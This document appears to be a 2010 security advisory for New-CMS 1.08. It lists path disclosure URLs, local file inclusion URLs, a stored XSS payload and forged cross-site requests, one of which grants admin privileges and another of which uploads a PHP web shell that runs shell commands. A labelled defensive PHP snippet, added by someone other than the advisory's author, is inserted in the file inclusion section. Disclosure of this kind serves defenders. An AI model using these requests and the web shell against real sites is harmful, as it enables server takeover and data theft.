New-CMS v1.08 [ Multiple Vulnerabilities ]

[+] [SOFTWARE] :: New-CMS

[+] [SOFTWARE SITE] :: www.new-cms.org

[+] [VERSION] :: 1.08 (but possibly all versions)

[+] [DATE] :: 17 February 2010

[+] [AUTHOR] :: Alberto Fontanella (Fulgur Security)

 

[ 1 ] - [ Full Path Disclosure ]

http://[host]/struttura/ricerca.php

http://[host]/pdf.php

http://[host]/index.php?lng=it&pg=manager

...etc

Output: Fatal error: Call to undefined function ListaFile() in /var/www/struttura/ricerca.php on line 8

[ 2 ] - [ Local File Inclusion ]

http://[host]/index.php?pg=cmd

You have to put cmd.php in /struttura/

http://[host]/pdf.php?lng=cmd.php

http://[host]/newcms/struttura/manager.php?lng=cmd.php

http://[host]/newcms/struttura/editor/quote.php?lng=cmd.php

...etc

You have to put cmd.php.str in /lingue/
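
A hardened way to resolve the pg and lng values from section 2, as an added example (not New-CMS code and not part of the original advisory). It assumes the application appends .php or .str to the request value and includes the result from struttura/ or lingue/; the function name, demo directory layout and language list are hypothetical.

```php
<?php
// Added example, not New-CMS code. Assumption: include paths are built as
// <dir>/<request value><suffix>, e.g. lingue/<lng>.str or struttura/<pg>.php.

/** Return the absolute path to include, or null when the value is rejected. */
function resolve_include(string $baseDir, string $value, string $suffix, array $allowed): ?string
{
    // 1. Allowlist: only names the application itself ships may be requested.
    if (!in_array($value, $allowed, true)) {
        return null;
    }
    // 2. Containment: the resolved file must exist directly inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $value . $suffix);
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demo layout in a temporary directory.
$root = sys_get_temp_dir() . '/newcms_demo_' . getmypid();
mkdir("$root/lingue", 0700, true);
file_put_contents("$root/lingue/it.str", "<?php // Italian strings\n");
file_put_contents("$root/lingue/cmd.php.str", "<?php // stray file\n");

$languages = ['it', 'en']; // hypothetical list of shipped languages

// 'en' is allowlisted but has no file here, so the containment step rejects it.
foreach (['it', 'cmd.php', '../struttura/manager', 'en'] as $lng) {
    $file = resolve_include("$root/lingue", $lng, '.str', $languages);
    printf("%-22s => %s\n", $lng, $file === null ? 'rejected' : 'include ' . basename($file));
}

// Remove the demo files.
array_map('unlink', glob("$root/lingue/*"));
rmdir("$root/lingue");
rmdir($root);
```

The same function covers the pg parameter when called with the struttura/ directory, the .php suffix and a list of the page names the site actually serves.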

[ 3 ] - [ Persistent XSS ]

Write an Article/News and put in the Title field: "><script>alert(1)</script>

[ 4 ] - [ XSRF ]

To give privileges to a user account:

POST /index.php?lng=it&pg=admin&s=redattori HTTP/1.1

Host: [host]

Content-Type: application/x-www-form-urlencoded

Content-Length: 64
 

azione=new&add_red=Haxor&opt1=on&opt2=on&opt3=on&opt4=on&opt5=on

 

To upload a PHP Shell:

POST /struttura/manager.php?lng=it&upload=ok&id=indirizzo_0 HTTP/1.1

Host: [host]

Content-Type: multipart/form-data; boundary=---------------------------213917452311081853951240913053

Content-Length: 424

-----------------------------213917452311081853951240913053

Content-Disposition: form-data; name="radice"

Content-Disposition: form-data; name="per"

-----------------------------213917452311081853951240913053

Content-Disposition: form-data; name="file"; filename="cmd9.php"

Content-Type: application/x-httpd-php

<?php system($_GET['cmd']); ?>

-----------------------------213917452311081853951240913053--
 

[ EOF ]